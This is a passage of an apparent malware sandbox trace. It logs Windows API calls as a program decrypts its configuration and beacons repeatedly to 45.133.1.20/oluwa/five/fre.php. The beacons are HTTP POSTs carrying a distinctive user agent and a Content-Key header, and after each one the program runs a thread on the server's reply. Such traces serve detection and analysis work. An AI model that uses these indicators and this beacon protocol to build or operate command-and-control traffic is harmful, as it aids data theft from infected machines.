0x6b4be0 [0319.805] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0319.805] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0319.827] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0319.827] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bef48) returned 1 [0319.843] GetProcessHeap () returned 0x6a0000 [0319.843] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0319.844] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0319.845] CryptImportKey (in: hProv=0x6bef48, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0319.846] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0319.846] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0319.847] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0319.848] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0319.848] GetProcessHeap () returned 0x6a0000 [0319.848] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0319.849] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0319.850] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4be0, pdwDataLen=0x19fcfc | out: pbData=0x6b4be0, pdwDataLen=0x19fcfc) returned 1 [0319.850] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0319.854] CryptDestroyKey (hKey=0x6ad020) returned 1 [0319.855] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0319.855] CryptReleaseContext (hProv=0x6bef48, dwFlags=0x0) returned 1 [0319.856] GetProcessHeap () returned 0x6a0000 [0319.856] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0319.856] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0319.857] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0319.858] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0319.858] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0319.859] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0319.860] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0319.861] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0319.861] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0319.861] GetProcessHeap () returned 0x6a0000 [0319.861] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0319.861] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0319.862] GetProcessHeap () returned 0x6a0000 [0319.862] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0319.862] GetProcessHeap () returned 0x6a0000 [0319.863] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0319.865] GetProcessHeap () returned 0x6a0000 [0319.866] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4be0 | out: hHeap=0x6a0000) returned 1 [0319.866] GetProcessHeap () returned 0x6a0000 [0319.866] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4910 [0319.867] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0319.868] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0319.878] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0319.879] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf278) returned 1 [0319.888] GetProcessHeap () returned 0x6a0000 [0319.888] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0319.889] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0319.889] CryptImportKey (in: hProv=0x6bf278, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad520) returned 1 [0319.890] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0319.891] CryptSetKeyParam (hKey=0x6ad520, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0319.891] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0319.892] CryptSetKeyParam (hKey=0x6ad520, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0319.892] GetProcessHeap () returned 0x6a0000 [0319.892] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0319.893] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0319.894] CryptDecrypt (in: hKey=0x6ad520, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4910, pdwDataLen=0x19fcfc | out: pbData=0x6b4910, pdwDataLen=0x19fcfc) returned 1 [0319.895] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0319.895] CryptDestroyKey (hKey=0x6ad520) returned 1 [0319.899] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0319.899] CryptReleaseContext (hProv=0x6bf278, dwFlags=0x0) returned 1 [0319.899] GetProcessHeap () returned 0x6a0000 [0319.899] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0319.900] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0319.901] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0319.902] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0319.902] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0319.903] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0319.903] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0319.904] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0319.905] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0319.905] GetProcessHeap () returned 0x6a0000 [0319.905] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0319.905] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3800*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6bea90*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0319.905] GetProcessHeap () returned 0x6a0000 [0319.905] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6bab00 [0319.905] socket (af=2, type=1, protocol=6) returned 0xc60 [0319.906] connect (s=0xc60, name=0x6bea90*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0319.943] FreeAddrInfoW (pAddrInfo=0x6b3800*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6bea90*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0319.943] GetProcessHeap () returned 0x6a0000 [0319.943] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bf058 [0319.943] GetProcessHeap () returned 0x6a0000 [0319.943] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6dff48 [0319.944] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0319.945] wvsprintfA (in: param_1=0x6dff48, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0319.945] GetProcessHeap () returned 0x6a0000 [0319.945] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6df328 [0319.945] GetProcessHeap () returned 0x6a0000 [0319.946] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dff48 | out: hHeap=0x6a0000) returned 1 [0319.946] GetProcessHeap () returned 0x6a0000 [0319.946] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b49a0 [0319.946] GetProcessHeap () returned 0x6a0000 [0319.946] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6dff48 [0319.947] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0319.948] wvsprintfA (in: param_1=0x6dff48, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0319.948] GetProcessHeap () returned 0x6a0000 [0319.948] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0319.948] GetProcessHeap () returned 0x6a0000 [0319.949] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dff48 | out: hHeap=0x6a0000) returned 1 [0319.949] send (s=0xc60, buf=0x6bd460*, len=242, flags=0) returned 242 [0319.950] send (s=0xc60, buf=0x6bb998*, len=159, flags=0) returned 159 [0319.950] GetProcessHeap () returned 0x6a0000 [0319.950] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c6f28 [0319.950] recv (in: s=0xc60, buf=0x6c6f28, len=4048, flags=0 | out: buf=0x6c6f28*) returned 204 [0320.030] GetProcessHeap () returned 0x6a0000 [0320.031] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0320.031] GetProcessHeap () returned 0x6a0000 [0320.031] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b49a0 | out: hHeap=0x6a0000) returned 1 [0320.031] GetProcessHeap () returned 0x6a0000 [0320.031] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6df328 | out: hHeap=0x6a0000) returned 1 [0320.031] GetProcessHeap () returned 0x6a0000 [0320.032] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bf058 | out: hHeap=0x6a0000) returned 1 [0320.032] closesocket (s=0xc60) returned 0 [0320.032] GetProcessHeap () returned 0x6a0000 [0320.032] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bab00 | out: hHeap=0x6a0000) returned 1 [0320.032] GetProcessHeap () returned 0x6a0000 [0320.033] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0320.033] GetProcessHeap () returned 0x6a0000 [0320.034] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4910 | out: hHeap=0x6a0000) returned 1 [0320.034] GetProcessHeap () returned 0x6a0000 [0320.034] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0320.034] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c6f28, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x19c8) returned 0xc60 [0320.036] Sleep (dwMilliseconds=0xea60) [0320.038] GetProcessHeap () returned 0x6a0000 [0320.038] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4be0 [0320.039] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0320.039] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0320.047] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0320.047] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6beb90) returned 1 [0320.054] GetProcessHeap () returned 0x6a0000 [0320.054] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0320.055] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0320.055] CryptImportKey (in: hProv=0x6beb90, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0320.056] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0320.056] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0320.065] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0320.066] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0320.066] GetProcessHeap () returned 0x6a0000 [0320.066] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0320.067] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0320.067] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4be0, pdwDataLen=0x19fcfc | out: pbData=0x6b4be0, pdwDataLen=0x19fcfc) returned 1 [0320.068] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0320.069] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0320.070] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0320.070] CryptReleaseContext (hProv=0x6beb90, dwFlags=0x0) returned 1 [0320.070] GetProcessHeap () returned 0x6a0000 [0320.070] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0320.071] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0320.072] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0320.072] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0320.076] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0320.077] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0320.078] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0320.078] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0320.079] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0320.079] GetProcessHeap () returned 0x6a0000 [0320.079] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0320.079] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0320.079] GetProcessHeap () returned 0x6a0000 [0320.080] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0320.080] GetProcessHeap () returned 0x6a0000 [0320.080] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0320.080] GetProcessHeap () returned 0x6a0000 [0320.080] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4be0 | out: hHeap=0x6a0000) returned 1 [0320.080] GetProcessHeap () returned 0x6a0000 [0320.080] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4be0 [0320.081] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0320.082] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0320.092] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0320.092] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bef48) returned 1 [0320.100] GetProcessHeap () returned 0x6a0000 [0320.101] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0320.101] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0320.102] CryptImportKey (in: hProv=0x6bef48, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0320.103] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0320.103] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0320.104] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0320.105] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0320.105] GetProcessHeap () returned 0x6a0000 [0320.105] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0320.106] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0320.109] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4be0, pdwDataLen=0x19fcfc | out: pbData=0x6b4be0, pdwDataLen=0x19fcfc) returned 1 [0320.110] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0320.110] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0320.111] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0320.114] CryptReleaseContext (hProv=0x6bef48, dwFlags=0x0) returned 1 [0320.114] GetProcessHeap () returned 0x6a0000 [0320.114] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0320.115] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0320.115] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0320.116] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0320.117] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0320.120] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0320.121] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0320.122] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0320.122] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0320.122] GetProcessHeap () returned 0x6a0000 [0320.122] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0320.122] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3800*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0320.122] GetProcessHeap () returned 0x6a0000 [0320.122] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6ba9c0 [0320.122] socket (af=2, type=1, protocol=6) returned 0xc64 [0320.123] connect (s=0xc64, name=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0320.149] FreeAddrInfoW (pAddrInfo=0x6b3800*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0320.149] GetProcessHeap () returned 0x6a0000 [0320.150] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6beb90 [0320.150] GetProcessHeap () returned 0x6a0000 [0320.150] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6dff48 [0320.151] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0320.152] wvsprintfA (in: param_1=0x6dff48, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0320.152] GetProcessHeap () returned 0x6a0000 [0320.152] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6df6e8 [0320.153] GetProcessHeap () returned 0x6a0000 [0320.153] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dff48 | out: hHeap=0x6a0000) returned 1 [0320.153] GetProcessHeap () returned 0x6a0000 [0320.153] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4d48 [0320.153] GetProcessHeap () returned 0x6a0000 [0320.153] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6dff48 [0320.154] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0320.155] wvsprintfA (in: param_1=0x6dff48, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0320.155] GetProcessHeap () returned 0x6a0000 [0320.155] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0320.155] GetProcessHeap () returned 0x6a0000 [0320.156] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dff48 | out: hHeap=0x6a0000) returned 1 [0320.156] send (s=0xc64, buf=0x6bd460*, len=242, flags=0) returned 242 [0320.157] send (s=0xc64, buf=0x6bb998*, len=159, flags=0) returned 159 [0320.157] GetProcessHeap () returned 0x6a0000 [0320.157] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c6f28 [0320.157] recv (in: s=0xc64, buf=0x6c6f28, len=4048, flags=0 | out: buf=0x6c6f28*) returned 204 [0320.251] GetProcessHeap () returned 0x6a0000 [0320.253] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0320.253] GetProcessHeap () returned 0x6a0000 [0320.253] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0320.253] GetProcessHeap () returned 0x6a0000 [0320.254] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6df6e8 | out: hHeap=0x6a0000) returned 1 [0320.254] GetProcessHeap () returned 0x6a0000 [0320.254] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6beb90 | out: hHeap=0x6a0000) returned 1 [0320.254] closesocket (s=0xc64) returned 0 [0320.255] GetProcessHeap () returned 0x6a0000 [0320.255] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ba9c0 | out: hHeap=0x6a0000) returned 1 [0320.255] GetProcessHeap () returned 0x6a0000 [0320.255] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0320.255] GetProcessHeap () returned 0x6a0000 [0320.256] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4be0 | out: hHeap=0x6a0000) returned 1 [0320.256] GetProcessHeap () returned 0x6a0000 [0320.256] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0320.256] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c6f28, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x19cc) returned 0xc64 [0320.258] Sleep (dwMilliseconds=0xea60) [0320.260] GetProcessHeap () returned 0x6a0000 [0320.260] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4760 [0320.261] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0320.261] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0320.272] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0320.272] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf0e0) returned 1 [0320.282] GetProcessHeap () returned 0x6a0000 [0320.282] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0320.283] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0320.283] CryptImportKey (in: hProv=0x6bf0e0, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0320.284] 